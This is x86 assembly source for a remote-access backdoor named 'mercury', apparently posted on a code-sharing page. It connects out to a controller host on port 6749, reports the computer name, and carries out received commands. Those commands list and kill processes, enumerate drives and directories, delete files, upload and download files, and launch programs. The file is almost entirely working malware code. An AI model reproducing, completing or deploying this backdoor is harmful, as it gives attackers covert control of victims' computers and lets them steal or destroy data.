📄 mercury.asm
字号:
.586
.model flat
locals @@
DEBUG equ 1
include useful.inc
PORT equ 6749
REPLY_SUCCESS equ 02h
REPLY_FAIL equ 01h
.data
fmt db "%s",7,"%08X",7,0
dns db '127.0.0.1',0
ifdef DEBUG
ws32send dd 0
ws32recv dd 0
send_title db 'send: ',0
recv_title db 'recv: ',0
decimal_fmt db '%u',0
endif
.code
public c entry
entry:
; nop
; int 3
ifdef DEBUG
extern send:PROC
extern recv:PROC
mov eax,offset sendwrap
mov ecx,offset recvwrap
mov ebx,offset send
mov ebx,[ebx+2]
xchg eax,[ebx]
mov ebx,offset recv
mov ebx,[ebx+2]
xchg ecx,[ebx]
mov [ws32send],eax
mov [ws32recv],ecx
endif
sub ebp,ebp
sub esp,190h
push esp
push 1
callw WSAStartup
@@online:
push 6
push 1
push 2
callw socket
mov ebx,eax
push offset dns
callw inet_addr
inc eax
jz @@hostname
dec eax
jmp short @@next
@@hostname:
push offset dns
callw gethostbyname
; test eax,eax
; jz @@not_online
mov eax,dwo [eax+12]
mov eax,dwo [eax]
mov eax,dwo [eax]
@@next:
push ebp
push ebp
push eax
mov eax,PORT
xchg ah,al
shl eax,16
add eax,2
push eax
mov edi,esp
@@connection:
push 16
push edi
push ebx
callw connect
test eax,eax
jz @@thread
push 100
callw Sleep
jmp short @@connection
@@thread:
add esp,4*4
push ebp
push esp
push ebp
push ebx
push offset threadproc
push ebp
push ebp
callw CreateThread
pop ecx
push -1
push eax
callw WaitForSingleObject
push ebx
callw closesocket
jmp short @@online
@@not_online:
ret
threadproc:
; nop
; int 3
pushad
mov ebx,[esp+8*4+4]
sub ebp,ebp
mov edi,256
sub esp,edi
mov esi,esp
push edi
push esp
push esi
callw GetComputerNameA
pop ecx
push ebp
push edi
push esi
push ebx
callw send
; push 100
; callw Sleep
@@recv_loop:
mov esi,esp
push edi
push esi
callw RtlZeroMemory
push ebp
push edi
push esi
push ebx
callw recv
test eax,eax
jz @@do_exit
inc eax
jz @@do_exit
dec eax
lodsd
cmp eax,'tsil' ;list
je @@do_list
cmp eax,' led' ;del + SPACE
je @@do_del
cmp eax,' rid' ;dir + SPACE
je @@do_dir
cmp eax,'vird' ;driv
je @@do_drive
cmp eax,'dlpu' ;upld
je @@do_upld
cmp eax,'nwod' ;down
je @@do_down
cmp eax,'llik' ;kill
je @@do_kill
cmp eax,' nur' ;run + SPACE
je @@do_run
cmp eax,'tiuq' ;quit
jnz @@recv_loop
push eax
callw ExitProcess
@@do_exit:
add esp,256
popad
retn
@@do_list:
pushad
push ebp
push 2
callw CreateToolhelp32Snapshot
mov edi,eax
push 4096
pop ecx
sub esp,ecx
mov ebp,esp
push ecx
push ebp
callw RtlZeroMemory
; push 128h
; pop ecx
mov ecx,128h
sub esp,ecx
mov [esp],ecx
push esp
push edi
callw Process32First
@@step_list:
lea esi,[esp+36]
push dwo [esp+8]
push esi
lodsb
test al,al
jnz $-3
push offset fmt
push esi
callw wsprintfA
add esp,4*4
push esi
push ebp
callw lstrcat
push esp
push edi
callw Process32Next
test eax,eax
jnz @@step_list
push edi
callw CloseHandle
push 0
push 4096
push ebp
push ebx
callw send
add esp,(128h+4096)
popad
jmp @@recv_loop
@@do_kill:
pushad
inc esi
call str2hex
push eax
push ebp
push 1
callw OpenProcess
push ebp
push eax
callw TerminateProcess
call send_success
popad
jmp @@recv_loop
@@do_upld:
pushad
call send_success
inc esi
push esi
lodsb
sub al,' '
jnz $-3
mov [esi-1],al
call str2long
mov esi,ecx
pop eax
push ebp
push 80h
push 2
push ebp
push ebp
push 40000000h
push eax
callw CreateFileA
mov edi,eax
sub esp,2048
mov ebp,esp
@@file_loop:
push 2048
push ebp
callw RtlZeroMemory
push 0
push 2048
push ebp
push ebx
callw recv
test eax,eax
jz @@exit
push eax
push 0
lea ecx,[esp-4]
push ecx
push eax
push ebp
push edi
callw WriteFile
pop eax
sub esi,eax
test esi,esi
jnz @@file_loop
@@exit:
push edi
callw CloseHandle
add esp,2048
popad
jmp @@recv_loop
;@@do_down:
; pushad
; inc esi
;
; push ebp
; push ebp
; push 3
; push ebp
; push ebp
; push 80000000h
; push esi
; callw CreateFileA
; inc eax
; jz @@error
; dec eax
; mov edi,eax
;
; push ebp
; push edi
; callw GetFileSize
;; mov esi,eax
;
; push ebp
; push eax
; mov eax,esp
;
; push ebp
; push 5
; push eax
; push ebx
; callw send
; pop esi
;
; mov eax,esp
; push ebp
; push 5
; push eax
; push ebx
; callw recv
; pop ecx
; test eax,eax
; js @@error
; jz @@error
;
; sub esp,2048
; mov ebp,esp
;
;@@down_loop:
; push 2048
; push ebp
; callw RtlZeroMemory
;
; push eax
; push 0
; lea eax,[esp+4]
; push eax
; push 2048
; push ebp
; push edi
; callw ReadFile
; pop ecx
;
; push 0
; push ecx
; push ebp
; push ebx
; callw send
;
; sub esi,eax
; test esi,esi
; jnz @@down_loop
;
; push edi
; callw CloseHandle
;
; add esp,2048
; popad
; jmp @@recv_loop
;
;@@error:
; call send_fail
; popad
; jmp @@recv_loop
@@do_down:
pushad
inc esi
push ebp
push ebp
push 3
push ebp
push ebp
push 80000000h
push esi
callw CreateFileA
inc eax
jz @@error
dec eax
mov edi,eax
push ebp
push edi
callw GetFileSize
mov esi,eax
sub esp,64
mov eax,esp
push eax
push 64
push eax
callw RtlZeroMemory
pop eax
push eax
push esi
call dword2hexstr
push ebp
push 60
push eax
push ebx
callw send
add esp,60
mov eax,esp
push ebp
push 5
push eax
push ebx
callw recv
pop ecx
test eax,eax
js @@error
jz @@error
sub esp,2048
mov ebp,esp
@@down_loop:
push 2048
push ebp
callw RtlZeroMemory
push eax
push 0
lea eax,[esp+4]
push eax
push 2048
push ebp
push edi
callw ReadFile
pop ecx
push 0
push ecx
push ebp
push ebx
callw send
sub esi,eax
test esi,esi
jnz @@down_loop
push edi
callw CloseHandle
add esp,2048
popad
jmp @@recv_loop
@@error:
call send_fail
popad
jmp @@recv_loop
@@do_run:
pushad
push 1
push ebp
push ebp
push esi
call @@s_open
db 'open',0
@@s_open:
push ebp
callw ShellExecuteA
call send_success
popad
jmp @@recv_loop
@@do_dir:
pushad
sub esp,1024
mov ebp,esp
sub esp,140h
mov edi,esp
push edi
push esi
lodsb
test al,al
jnz $-3
mov dwo [esi-1],'*.*\' ;\*.*
mov dwo [esi+3],0
callw FindFirstFileA
inc eax
jz @@exit_dir
dec eax
@@find_next:
push eax
mov ecx,[edi]
bt ecx,4 ;FILE_ATTRIBUTE_DIRECTORY
jnc @@file
sub ecx,ecx
dec ecx ;-1
jmp short @@build
@@file:
mov ecx,[edi+20h]
@@build:
lea eax,[edi+2ch]
push ecx
push eax
push offset fmt
push ebp
callw wsprintfA
add esp,4*4
push 0
push eax
push ebp
push ebx
callw send
pop eax
push eax
push edi
push eax
callw FindNextFileA
test eax,eax
pop eax
jnz @@find_next
push eax
callw FindClose
call send_success
@@exit_dir:
add esp,(140h+1024)
popad
jmp @@recv_loop
@@do_del:
pushad
push esi
callw DeleteFileA
call send_success
popad
jmp @@recv_loop
@@do_drive:
pushad
sub esp,256
mov esi,esp
sub edi,edi
callw GetLogicalDrives
@@rotate:
inc edi
shr eax,1
jnc @@rotate
test eax,eax
jz @@done
pushad
mov ecx,005c3a40h ;'@:\',0
add ecx,edi
push ecx
mov ecx,esp
dec ebp
push ebp
push ecx
push offset fmt
push esi
callw wsprintfA
add esp,4*4+4
push 0
push eax
push esi
push ebx
callw send
popad
jmp @@rotate
@@done:
call send_success
add esp,256
popad
jmp @@recv_loop
str2hex:
pushad
sub edx,edx
push 8
pop ecx
add esi,7
std
@@round1:
lodsb
sub al,30h
cmp al,09h
jbe @@round2
and al,11011111b
sub al,07h
cmp al,0fh
ja @@end
@@round2:
add dl,al
ror edx,4
loop @@round1
mov [esp+pushad_eax],edx
@@end:
popad
ret
dword2hexstr:
pushad
mov eax,[esp+8*4+4]
mov edi,[esp+8*4+8]
mov cl,8
@@rnd1:
rol eax,4
push eax
and al,00001111b
add al,30h
cmp al,39h
jbe @@rnd2
add al,07h
@@rnd2:
stosb
pop eax
loop @@rnd1
popad
ret 2*4
str2long:
sub eax,eax
sub ecx,ecx
@@nextdigit:
lodsb
sub al,'0'
jb @@done
cmp al,9
ja @@done
imul ecx,10
add ecx,eax
jmp short @@nextdigit
@@done:
ret
send_success:
pushad
push 0
push 1
call @@reply_byte
db REPLY_SUCCESS,0
@@reply_byte:
push ebx
callw send
popad
ret
send_fail:
pushad
push 0
push 1
call @@reply_byte
db REPLY_FAIL,0
@@reply_byte:
push ebx
callw send
popad
ret
ifdef DEBUG
;thanks to comrade64:
sendwrap:
; int 3
push dwo [esp+0ch]
push dwo [esp+0ch]
push offset send_title
call hexdump
jmp [ws32send]
recvwrap:
; int 3
push dwo [esp+10h]
push dwo [esp+10h]
push dwo [esp+10h]
push dwo [esp+10h]
call ws32recv
push eax
push eax
push dwo [esp+10h]
push offset recv_title
call hexdump
pop eax
retn 10h
hexdump proc pszTitle:dword, lpData:dword, dwLength:dword
LOCAL chars[64]:byte
enter 64,0
lea eax,chars
push 64
push eax
callw RtlZeroMemory
push ebx
push esi
push edi
push [pszTitle]
callw lstrlen
push eax
push [pszTitle]
call strout
lea edi,[chars]
push [dwLength]
push offset decimal_fmt
push edi
callw wsprintfA
add esp,3*4
add edi,eax
mov eax,'tyb '
stosd
mov eax,'se'
stosw
lea eax,[chars]
sub edi,eax
push edi
push eax
call strout
call @@nl
mov esi,[lpData]
mov ecx,[dwLength]
xor ebx,ebx
test ecx,ecx
jle @@quit
@@next:
push ecx
lea edi,[chars]
lodsb
mov ah,al
shr al,4
and ah,0Fh
cmp al,10
sbb al,69h
das
stosb
mov al,ah
cmp al,10
sbb al,69h
das
stosb
mov al," "
stosb
sub edi,3
push 3
push edi
call strout
inc ebx
cmp ebx,10h
jl @@skip
call @@ascii
call @@nl
@@skip:
pop ecx
loop @@next
call @@ascii
push offset @@quit
and [pszTitle],0
@@nl:
lea edi,[chars]
mov wo [edi],0A0Dh
push 2
push edi
call strout
push [pszTitle]
callw lstrlen
test eax,eax
mov ebx,eax
jz @@nopad
mov by [edi]," "
@@back_1:
push 1
push edi
call strout
dec ebx
jg @@back_1
@@nopad:
retn
@@ascii:
mov ecx,10h
sub ecx,ebx
inc ecx
test ecx,ecx
jle @@anopad
lea ecx,[ecx+ecx*2]
lea edi,[chars]
mov by [edi]," "
@@back_2:
push ecx
push 1
push edi
call strout
pop ecx
dec ecx
jg @@back_2
@@anopad:
sub esi,ebx
@@achar:
lodsb
cmp al,20h
jae @@forward_1
mov al,"."
@@forward_1:
mov [edi],al
push 1
push edi
call strout
dec ebx
jg @@achar
retn
@@quit:
pop edi
pop esi
pop ebx
leave
ret 3*4
hexdump endp
strout:
pushad
mov esi,[esp+8*4+4]
mov ecx,[esp+8*4+8]
@@print_char:
lodsb
push eax
call charout
dec ecx
test ecx,ecx
jnz @@print_char
popad
ret 2*4
charout:
pushad
mov al,[esp+8*4+4]
push eax
callw putchar
add esp,4
popad
ret 4
endif
end⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -